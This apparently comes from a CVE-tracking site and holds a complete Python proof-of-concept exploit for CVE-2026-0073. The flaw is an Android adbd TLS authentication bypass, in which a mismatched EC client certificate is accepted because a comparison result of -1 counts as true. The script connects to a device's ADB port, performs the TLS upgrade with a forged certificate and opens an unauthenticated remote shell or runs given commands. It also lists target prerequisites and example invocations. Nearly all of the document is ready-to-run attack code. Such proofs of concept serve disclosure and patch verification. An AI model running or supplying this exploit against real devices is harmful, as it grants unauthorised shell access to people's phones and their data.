5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / adb_tls_auth_bypass.py PY
#!/usr/bin/env python3
"""
CVE-2026-0073 — Android adbd EVP_PKEY_cmp TLS authentication bypass

adbd_tls_verify_cert() in daemon/auth.cpp uses EVP_PKEY_cmp() as a
boolean. When the stored key is RSA and the presented TLS client cert carries a
non-RSA key (EC P-256 or Ed25519), EVP_PKEY_cmp() returns -1 (type mismatch),
which is truthy in C/C++, so authorized = true.

  1. TCP connect to adbd port
  2. Send cleartext ADB CNXN; receive STLS from device
  3. Reply STLS; upgrade TCP to TLS 1.3 with ephemeral EC P-256 client cert
  4. Post-TLS: drain device CNXN (and optional STLS notification) — do NOT send host CNXN
     (adbd_wifi_secure_connect already marks the transport online; a host CNXN would
     trigger handle_new_connection on an already-online transport, kicking it immediately)
  5. OPEN(local_id, INITIAL_DELAYED_ACK_BYTES=32MB, "shell:\\x00") → OKAY → WRTE/OKAY shell

Requirements:
  - Developer options enabled on target
  - Wireless debugging or ADB-over-TCP enabled (default port 5555)
  - At least one RSA key in /data/misc/adb/adb_keys (device has been paired before)
  - Network reachability to the adbd TCP port

Usage:
  python3 adb_tls_auth_bypass.py <host> [port] [--cmd <command>]

  Default port: 5555
  Default cmd:  interactive shell (stdin/stdout forwarded)


Tested on 6.1.23-android14-4-00257-g7e35917775b8-ab9964412

Examples:
  python3 adb_tls_auth_bypass.py 192.168.1.42
  python3 adb_tls_auth_bypass.py 192.168.1.42 5555 --cmd "id; getprop ro.build.version.release"
"""


import argparse
import io
import os
import socket
import ssl
import struct
import sys
import tempfile
import textwrap
import threading
import time

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.x509.oid import NameOID
import datetime

# ---------------------------------------------------------------------------
ADB_VERSION    = 0x01000001
ADB_MAXDATA    = 256 * 1024
ADB_BANNER     = b"host::features=shell_v2,cmd,stat_v2,ls_v2,fixed_push_mkdir,apex,abb,fixed_push_symlink_timestamp,abb_exec,remount_shell,track_app,sendrecv_v2,sendrecv_v2_brotli,sendrecv_v2_lz4,sendrecv_v2_zstd,sendrecv_v2_dry_run_send,openscreen_mdns,delayed_ack"

# adbd delayed_ack initial receive window (INITIAL_DELAYED_ACK_BYTES from adb.h)
DELAYED_ACK_WINDOW = 32 * 1024 * 1024  # 0x2000000

CMD_CNXN = 0x4e584e43
CMD_STLS = 0x534c5453
CMD_AUTH = 0x48545541
CMD_OPEN = 0x4e45504f
CMD_OKAY = 0x59414b4f
CMD_WRTE = 0x45545257
CMD_CLSE = 0x45534c43

STLS_VERSION = 0x01000000

# ---------------------------------------------------------------------------
def _checksum(data: bytes) -> int:
    return sum(data) & 0xFFFFFFFF


def pack_packet(cmd: int, arg0: int, arg1: int, data: bytes = b"") -> bytes:
    length = len(data)
    csum   = _checksum(data)
    magic  = cmd ^ 0xFFFFFFFF
    header = struct.pack("<IIIIII", cmd, arg0, arg1, length, csum, magic)
    return header + data


def unpack_header(raw: bytes):
    cmd, arg0, arg1, length, csum, magic = struct.unpack("<IIIIII", raw)
    return cmd, arg0, arg1, length, csum, magic


def recv_packet(sock):
    """Read one ADB packet from sock. Returns (cmd, arg0, arg1, data)."""
    header = _recv_exact(sock, 24)
    cmd, arg0, arg1, length, csum, magic = unpack_header(header)
    data = _recv_exact(sock, length) if length else b""
    return cmd, arg0, arg1, data


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"connection closed after {len(buf)}/{n} bytes")
        buf += chunk
    return buf

def make_ec_client_cert() -> tuple[bytes, bytes]:
    """
    Generate a throw-away EC P-256 key + self-signed cert.
    The cert key type is intentionally EC, not RSA, to trigger the
    cross-algorithm EVP_PKEY_cmp() return value of -1.
    Returns (cert_pem, key_pem).
    """
    key = ec.generate_private_key(ec.SECP256R1())
    subject = issuer = x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, u"adbkey"),
    ])
    cert = (
        x509.CertificateBuilder()
        .subject_name(subject)
        .issuer_name(issuer)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(datetime.datetime.now(datetime.UTC))
        .not_valid_after(datetime.datetime.now(datetime.UTC) + datetime.timedelta(days=1))
        .sign(key, hashes.SHA256())
    )
    cert_pem = cert.public_bytes(serialization.Encoding.PEM)
    key_pem  = key.private_bytes(
        serialization.Encoding.PEM,
        serialization.PrivateFormat.TraditionalOpenSSL,
        serialization.NoEncryption(),
    )
    return cert_pem, key_pem

class ADBBypass:
    def __init__(self, host: str, port: int, verbose: bool = False):
        self.host    = host
        self.port    = port
        self.verbose = verbose
        self.sock    = None          # raw TCP socket (cleartext phase)
        self.tls     = None          # TLS-wrapped socket (post-upgrade)
        self._local_id  = 1
        self._remote_id = None

    def _log(self, msg: str):
        if self.verbose:
            print(f"[*] {msg}", file=sys.stderr)

    def _send(self, sock, data: bytes):
        sock.sendall(data)

    # --- Phase 1: cleartext ADB CNXN → STLS negotiation -------------------

    def connect(self):
        self._log(f"connecting to {self.host}:{self.port}")
        self.sock = socket.create_connection((self.host, self.port), timeout=10)

        # Send CNXN
        cnxn = pack_packet(CMD_CNXN, ADB_VERSION, ADB_MAXDATA, ADB_BANNER)
        self._log("sending CNXN")
        self._send(self.sock, cnxn)

        # Expect STLS back — device may send CNXN first on some builds, tolerate it
        for _ in range(3):
            cmd, arg0, arg1, data = recv_packet(self.sock)
            self._log(f"  <- {cmd:#010x} arg0={arg0:#x} arg1={arg1:#x} data={data[:64]!r}")
            if cmd == CMD_STLS:
                stls_version = arg0
                self._log(f"received STLS version={stls_version:#x}")
                break
            elif cmd == CMD_AUTH:
                # Device sent AUTH instead of STLS — not the wireless-debugging path
                raise RuntimeError(
                    "Device responded with AUTH instead of STLS. "
                    "Target is not using the STLS/TLS wireless-debugging path "
                    "(may be legacy ADB TCP, or auth_required=false)."
                )
            elif cmd == CMD_CNXN:
                self._log("received pre-STLS CNXN, waiting for STLS...")
                continue
            else:
                raise RuntimeError(f"unexpected command {cmd:#010x} during CNXN negotiation")
        else:
            raise RuntimeError("did not receive STLS from device")

        # Reply STLS
        self._log("sending STLS reply")
        self._send(self.sock, pack_packet(CMD_STLS, stls_version, 0))

    # --- Phase 2: TLS upgrade with cross-algorithm client cert -------------

    def upgrade_tls(self, cert_pem: bytes, key_pem: bytes):
        """Wrap the existing TCP socket in TLS 1.3 with the EC client cert."""
        self._log("upgrading to TLS 1.3 with EC P-256 client certificate")

        # Write cert/key to temp files (ssl module needs file paths)
        with tempfile.NamedTemporaryFile(delete=False, suffix=".pem") as cf:
            cf.write(cert_pem)
            cert_path = cf.name
        with tempfile.NamedTemporaryFile(delete=False, suffix=".pem") as kf:
            kf.write(key_pem)
            key_path = kf.name

        try:
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            ctx.check_hostname           = False
            ctx.verify_mode              = ssl.CERT_NONE   # we don't validate server cert
            ctx.minimum_version          = ssl.TLSVersion.TLSv1_3
            ctx.maximum_version          = ssl.TLSVersion.TLSv1_3
            ctx.load_cert_chain(certfile=cert_path, keyfile=key_path)

            self.tls = ctx.wrap_socket(self.sock, server_hostname=self.host)
            self._log(f"TLS handshake complete: {self.tls.version()}, cipher={self.tls.cipher()}")
        finally:
            os.unlink(cert_path)
            os.unlink(key_path)

    # --- Phase 3: post-TLS ADB service layer -------------------------------

    def post_tls_cnxn(self):
        """Drain post-TLS device packets (CNXN + optional STLS).

        The adbwifi path: adbd_wifi_secure_connect() calls handle_online(t) and
        send_connect(t) which sends the device CNXN. The transport is already
        online at this point. We must NOT send a host CNXN — doing so calls
        handle_new_connection() on an already-online transport which kicks it.
        """
        for _ in range(6):
            cmd, arg0, arg1, data = recv_packet(self.tls)
            self._log(f"  <- {cmd:#010x} arg0={arg0:#x} data={data[:64]!r}")
            if cmd == CMD_CNXN:
                self._log(f"device CNXN: {data.decode(errors='replace')}")
                break
            elif cmd == CMD_STLS:
                self._log(f"post-TLS STLS notification (version={arg0:#x}), ignoring")
                continue
            else:
                raise RuntimeError(f"expected CNXN/STLS inside TLS, got {cmd:#010x}")
        else:
            raise RuntimeError("did not receive post-TLS CNXN from device")
        # Drain the trailing STLS notification if present
        self._recv_skip_stls_drain()

    def _recv_skip_stls_drain(self):
        """Non-blocking drain of any buffered STLS notifications (max 0.3s)."""
        deadline = time.monotonic() + 0.3
        while time.monotonic() < deadline:
            try:
                self.tls.settimeout(0.05)
                cmd, arg0, arg1, data = recv_packet(self.tls)
                if cmd != CMD_STLS:
                    # Unexpected non-STLS — log and ignore, don't block
                    self._log(f"  unexpected post-drain packet {cmd:#010x}, ignoring")
            except (socket.timeout, OSError):
                break
            finally:
                self.tls.settimeout(None)

    def _recv_skip_stls(self):
        """Receive next packet, silently ignoring any STLS notifications."""
        for _ in range(8):
            cmd, arg0, arg1, data = recv_packet(self.tls)
            if cmd != CMD_STLS:
                return cmd, arg0, arg1, data
            self._log(f"  STLS notification, ignoring")
        raise RuntimeError("too many STLS frames")

    def open_shell(self) -> int:
        """Send OPEN shell:\\x00 with delayed_ack window. Returns remote_id on OKAY."""
        payload = b"shell:\x00"
        self._log(f"sending OPEN local_id={self._local_id} window={DELAYED_ACK_WINDOW:#x}")
        self._send(self.tls, pack_packet(CMD_OPEN, self._local_id, DELAYED_ACK_WINDOW, payload))

        cmd, arg0, arg1, data = self._recv_skip_stls()
        self._log(f"  <- {cmd:#010x} arg0={arg0:#x} arg1={arg1:#x}")
        if cmd != CMD_OKAY:
            raise RuntimeError(f"OPEN rejected: {cmd:#010x} (expected OKAY)")

        self._remote_id = arg0
        self._log(f"shell stream opened: local={self._local_id} remote={self._remote_id}")
        # Acknowledge the OKAY to grant our write window
        self._send_okay()
        return self._remote_id

    def _send_okay(self):
        self._send(self.tls, pack_packet(CMD_OKAY, self._local_id, self._remote_id))

    def run_command(self, cmd_str: str) -> str:
        """Run a single command, collect all output, return as string."""
        payload = f"shell:{cmd_str}\x00".encode()
        self._log(f"OPEN for command: {cmd_str!r}")
        self._send(self.tls, pack_packet(CMD_OPEN, self._local_id, DELAYED_ACK_WINDOW, payload))

        cmd_r, arg0, arg1, data = self._recv_skip_stls()
        if cmd_r != CMD_OKAY:
            raise RuntimeError(f"OPEN for command rejected: {cmd_r:#010x}")
        remote = arg0
        self._send(self.tls, pack_packet(CMD_OKAY, self._local_id, remote))

        output = io.BytesIO()
        while True:
            cmd_r, arg0, arg1, data = recv_packet(self.tls)
            if cmd_r == CMD_WRTE:
                output.write(data)
                self._send(self.tls, pack_packet(CMD_OKAY, self._local_id, remote))
            elif cmd_r == CMD_CLSE:
                break
            elif cmd_r == CMD_OKAY:
                continue
            else:
                break
        return output.getvalue().decode(errors="replace")

    def interactive_shell(self):
        """Forward stdin/stdout to the open ADB shell stream."""
        print("[+] interactive shell — Ctrl+C to exit", file=sys.stderr)

        stop = threading.Event()

        def reader():
            while not stop.is_set():
                cmd_r, arg0, arg1, data = recv_packet(self.tls)
                if cmd_r == CMD_WRTE:
                    sys.stdout.buffer.write(data)
                    sys.stdout.buffer.flush()
                    self._send_okay()
                elif cmd_r == CMD_CLSE:
                    stop.set()
                    break
                elif cmd_r == CMD_OKAY:
                    continue

        def writer():
            # select() on Windows only works on sockets, not stdin — use a blocking
            # read thread instead; the daemon flag ensures it exits when reader ends.
            while not stop.is_set():
                try:
                    data = sys.stdin.buffer.read1(4096)
                except (OSError, ValueError):
                    break
                if data:
                    self._send(self.tls, pack_packet(CMD_WRTE, self._local_id, self._remote_id, data))

        # ---------------------------------------------------------------------------
        t_read  = threading.Thread(target=reader, daemon=True)
        t_write = threading.Thread(target=writer, daemon=True)
        t_read.start()
        t_write.start()
        try:
            while t_read.is_alive():
                t_read.join(timeout=0.2)
        except KeyboardInterrupt:
            pass
        finally:
            stop.set()

    def close(self):
        try:
            if self.tls:
                self.tls.close()
            elif self.sock:
                self.sock.close()
        except Exception:
            pass

# ---------------------------------------------------------------------------
def main():
    parser = argparse.ArgumentParser(
        description="CVE-2026-0073 — ADB EVP_PKEY_cmp TLS auth bypass",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent("""\
            Examples:
              %(prog)s 192.168.1.42
              %(prog)s 192.168.1.42 5555 --cmd "id"
              %(prog)s 192.168.1.42 5555 --cmd "getprop ro.build.version.security_patch"
        """),
    )
    parser.add_argument("host",          help="target device IP or hostname")
    parser.add_argument("port", nargs="?", type=int, default=5555, help="ADB port (default 5555)")
    parser.add_argument("--cmd",         help="shell command to run (default: interactive shell)")
    parser.add_argument("-v", "--verbose", action="store_true")
    args = parser.parse_args()

    cert_pem, key_pem = make_ec_client_cert()

    bypass = ADBBypass(args.host, args.port, verbose=args.verbose)
    try:
        bypass.connect()
        bypass.upgrade_tls(cert_pem, key_pem)
        bypass.post_tls_cnxn()

        if args.cmd:
            output = bypass.run_command(args.cmd)
            print(output, end="")
        else:
            bypass.open_shell()
            bypass.interactive_shell()
    except KeyboardInterrupt:
        pass
    except Exception as e:
        print(f"[-] {e}", file=sys.stderr)
        sys.exit(1)
    finally:
        bypass.close()


if __name__ == "__main__":
    main()